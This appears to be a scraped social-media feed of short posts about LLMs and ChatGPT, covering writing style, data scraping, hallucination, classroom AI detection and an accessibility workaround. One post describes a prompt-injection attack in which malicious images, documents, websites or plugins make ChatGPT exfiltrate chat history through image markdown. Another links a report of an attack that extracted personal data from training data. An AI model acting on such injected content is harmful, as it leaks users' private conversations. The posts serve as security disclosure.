kegill, to ChatGPT
@kegill@mastodon.social avatar

LLM chat bots as generators in a “war over signals.”

@pluralistic inadvertently created a “bowel-looseningly terrifying” legal threat.

“The LLM I accidentally used to rewrite my legal threat transmuted my own prose into something that reads like it was written by a $600/hour paralegal working for a $1500/hour partner at a white-show law-firm.”



https://pluralistic.net/2023/09/07/govern-yourself-accordingly/

https://locusmag.com/2023/09/commentary-by-cory-doctorow-plausible-sentence-generators/

bortzmeyer, to ChatGPT French
@bortzmeyer@mastodon.gougere.fr avatar

Est-ce légitime de récolter des pages Web pour entrainer des IA ?

https://www.bortzmeyer.org/collecte-pour-l-ia.html

wuzzi23, to ChatGPT

ChatGPT is vulnerable to chat history exfilration via image markdown injection. Think “Bobby tables” but for data exfiltration!

This can be triggered via malicious data, eg images, vision, documents, web sites, plugins,.. anything that can trigger a prompt injection basically.

Here is a demo with Code Interpreter:

video/mp4

DaveMWilburn, to ChatGPT
cigitalgem, to ML
@cigitalgem@sigmoid.social avatar

systems can leak confidential data in their training set even with a very silly attack. This is a direct and clear issue that applies well beyond the case

https://www.engadget.com/a-silly-attack-made-chatgpt-reveal-real-phone-numbers-and-email-addresses-200546649.html

FeralRobots, to random
@FeralRobots@mastodon.social avatar

If you want to know why people don't trust or Microsoft or Google to fix a broken faux- , consider that using suicidal teens for A/B testing was regarded as perfectly fine by a Silicon Valley "health" startup developing ""-based suicide prevention tools.

(Aside: This is also where we get when techbros start doing faux-utilitarian moral calculus instead of just not doing obviously unethical shit.)

https://www.vice.com/en/article/5d9m3a/horribly-unethical-startup-experimented-on-suicidal-teens-on-facebook-tumblr-with-chatbot

SallyStrange, to StarTrek
@SallyStrange@eldritch.cafe avatar

Time to purge my phone of memes. This one is my favorite, but I'm setting it free. Time for someone else to watch over it for a while :blobhaj_heart:

SallyStrange,
@SallyStrange@eldritch.cafe avatar

Butlerian jihad, anyone?

jenny_ai_land, to llm
@jenny_ai_land@hci.social avatar

I saw recently an ArXiV paper that was evaluating the security of code written by people with and without LLM, and concluding that people who wrote with LLM less secure code while being more confident at the same time. I can’t find this paper again, does anyone has the link?

#LLM #academicchatter

x0, to ai
@x0@dragonscave.space avatar

How much you want to bet that these moves to close down APIs because of generative AI are being pushed by OpenAI and their ilk, or at least not actively opposed by them? Most of GPT was clearly sourced on reddit. Now, reddit wants to make the API outrageously expensive. With the funding OpenAI has it could pay those rates, but anyone wanting to develop an open-source alternative will not, thus never being able to achieve parity with the commercial models due to having a fair bit of that vast treasure trove of data inaccessible to them which GPT has already used.

techsinger, to llm

Just in case anyone is interested, and for the archives/searches, I recently asked if anyone had managed to use models to access interfaces, or other interfaces without , as a user. The idea was to use a capture card to bring in the video information from the inaccessible machine, send pictures from that video stream to the LLM, and get descriptions/ask questions. This is how I did it. It's not pretty, but it's another helpful tool for the toolbox. It requires a video capture card, HDMI or display port to USB, the OpenAI add-on, and a method of displaying the video from the capture card on screen. I tried four HDMI capture cards and all of them worked, I think the point is that the capture device should show up to Windows as a webcam. I haven't found a cheap capture device which didn't, the only reason I had to try four was that I was using audio input from the HDMI for another project and it's surprising how many devices will not receive the sound even in simple stereo. Anyhow, just searching for HDMI capture on google/amazon will probably get something to use. The Open AI NVDA Add-on is at https://github.com/aaclause/nvda-OpenAI/ The method I used to display the received video is at https://superuser.com/questions/1744688/how-can-i-view-the-video-coming-in-from-a-capture-card-on-windows-in-full-screen The steps are basically to put the puzzle pieces together. Set up the add-on with its instructions, copy and paste the HTML in the superuser link to a new HTML file, and open that HTML file in the browser. Having the file run from file explorer works fine, and firefox, at least, will ask for permission so make sure to allow it. Now, move the NVDA navigator cursor/focus to the video. Here, the object is called "document", the point is to avoid sending the entire screen, or even the firefox window. Having pressed the add-on command to capture the object, you will be placed in the prompt field and can ask any questions you like or rely on the default "describe this image" prompt. Generally, I will use the describe the image first and then ask follow-up questions or modify the image as best I can. Just a few tips. Maximizing the window and pressing the "full screen" button in firefox on the video appears to be helpful. The GPT 4 vision model does confabulate/hallucinate, and what it makes up is plausible. This is just another tool, not something to rely on exclusively. It is in addition to, rather than instead of, OCR, one's own knowledge, etc. The image is sometimes cut off, I'm not sure why this is but suspect at least some of it comes from its being displayed on the screen in the browser. I would welcome better ways to do this, as I said, it's not pretty and just what I could come up with in a few minutes of searching and with some trial/error. Having said that, it is a small step forward. Note that, as one would expect, the method also works to bring in pictures from a standard webcam. #ScreenReader

SomeGadgetGuy, to tech
@SomeGadgetGuy@techhub.social avatar

Watching and there are some cool demonstrations of data center cloud computing, but there's also this fog of dystopia surrounding these demos.
The announcements for search are horrifying. Google is full mask off.

Phrases like "search for something, and we'll collect all this data for you" basically equates to:

"We sucked up ALL the data from people who really did the work, and we're going to give you the results of their hard work, but we wont take you to the site that generated the data. You can stay on the search page, and the site's traffic will plummet."

This is shocking.

syntaxseed, to ai
@syntaxseed@phpc.social avatar

Teachers are jumping through hoops to identify / generated content in students' work.

My husband is a high-school English teacher.

His students must write essays in Google Docs & he uses a playback browser extension to watch the students' edits in fast-forward to identify chunks of pasted-in content. He also has half a dozen tools he analyses the work with that gives a score of how likely it is to be AI generated. And he compares the style & quality to their other work.

chikim, to macos
@chikim@mastodon.social avatar

Cool tip for running LLMs on Apple Silicon! By default, MacOS allows GPU to use up to 2/3 of RAM on machines with <=36GB and 3/4 on machines with >36GB. I used the command sudo sysctl iogpu.wired_limit_mb=57344 to override and allocate 56GB/64GB for GPU. This allowed me to load all layers of larger models for a faster speed!

nicola, to llm
@nicola@fosstodon.org avatar

Linus Torvalds on the impact of AI (LLMs) on programming:

https://www.youtube.com/watch?v=VHHT6W-N0ak

I think I like his take on the topic.

Seirdy, to Blog
@Seirdy@pleroma.envs.net avatar

New post: MDN’s AI Help and lucid lies.

This article on AI focused on the inherent untrustworthiness of LLMs, and attempts to break down where LLM untrustworthiness comes from. Stay tuned for a follow-up article about AI that focuses on data-scraping and the theory of labor. It’ll examine what makes many forms of generative AI ethically problematic, and the constraints employed by more ethical forms.

Excerpt:

I don’t find the mere existence of LLM dishonesty to be worth blogging about; it’s already well-established. Let’s instead explore one of the inescapable roots of this dishonesty: LLMs exacerbate biases already present in their training data and fail to distinguish between unrelated concepts, creating lucid lies.

A lucid lie is a lie that, unlike a hallucination, can be traced directly to content in training data uncritically absorbed by a large language model. MDN’s AI Help is the perfect example.


Originally posted on seirdy.one: see original.

hrheingold, to ai
@hrheingold@mastodon.social avatar

Why crap-detection literacy is essential, not only for online info, but for using LLMs

Hallucination is Inevitable: An Innate Limitation of Large Language Models

https://arxiv.org/abs/2401.11817

"In this paper, we formalize the problem and show that it is impossible to eliminate hallucination in LLMs."

scottjenson, to llm
@scottjenson@social.coop avatar

I'm looking for any recommendations of blog posts/articles that explore the potential limits of tech or examples of or going wrong in ways that show it's limits.

Bonus points for anything that discusses use cases.

There are no end of "positive" examples, they are plastered everywhere! I'm assuming there is something a bit calmer and measured out there.

Any suggestions?

pocketvj, to linuxphones
@pocketvj@fosstodon.org avatar

finally installed an offline chatbot on

due to i can not visit reddit, gitlab, docker and other sites, where an offline comes in handy to help out.

still need to create launcher-script and a temperature watcher, since the turns into a fancy pocket heater 😅

instructions on my wiki page

TexasObserver, to politics
@TexasObserver@texasobserver.social avatar

Earlier: Congress, at this point under the current speaker, is basically nonfunctional. Everybody says, ‘Oh, Congress can pass a law.’ And they can. But they won’t. Let’s not waste much effort.

https://www.texasobserver.org/sxsw-disinformation-artificial-intelligence/

maj, to llm
@maj@cosocial.ca avatar

'Librarian Andrew Gray has made a “very surprising” discovery. He analyzed five million scientific studies published last year and detected a sudden rise in the use of certain words, such as meticulously (up 137%), intricate (117%), commendable (83%) and meticulous (59%). [...] The explanation for this rise: tens of thousands of researchers are using [...] LLMs tools to write their studies or at least “polish” them.'

https://english.elpais.com/science-tech/2024-04-25/excessive-use-of-words-like-commendable-and-meticulous-suggest-chatgpt-has-been-used-in-thousands-of-scientific-studies.html

niclake, to ai
@niclake@mastodon.social avatar

I'd been writing a post for talking about some of the more comical fuck-ups all of these and have been spewing. And now I'm fucking furious.

Note: content warning for depression, self-harm, and suicide

https://niclake.me/ai

ajsadauskas, to ai
@ajsadauskas@aus.social avatar

In five years time, some CTO will review the mysterious outage or technical debt in their organisation.

They will unearth a mess of poorly written, poorly -documented, barely-functioning code their staff don't understand.

They will conclude that they did not actually save money by replacing human developers with LLMs.

@technology

vicki, to machinelearning
@vicki@jawns.club avatar

New post: I’ve been meaning to write something around what has fundamentally changed around the process of putting ML into prod now that we have LLMs.

TL;DR: It's still just compression, we just don't control as much anymore.

https://vickiboykis.com/2024/01/15/whats-new-with-ml-in-production/

lina, to ai
@lina@neuromatch.social avatar
tk, to ai
@tk@bbs.kawa-kun.com avatar
  • All
  • Subscribed
  • Moderated
  • Favorites
  • JUstTest
  • kavyap
  • DreamBathrooms
  • khanakhh
  • magazineikmin
  • mdbf
  • tacticalgear
  • osvaldo12
  • Youngstown
  • rosin
  • slotface
  • ethstaker
  • everett
  • thenastyranch
  • megavids
  • InstantRegret
  • Durango
  • normalnudes
  • Leos
  • tester
  • ngwrru68w68
  • cisconetworking
  • cubers
  • GTA5RPClips
  • anitta
  • provamag3
  • modclub
  • lostlight
  • All magazines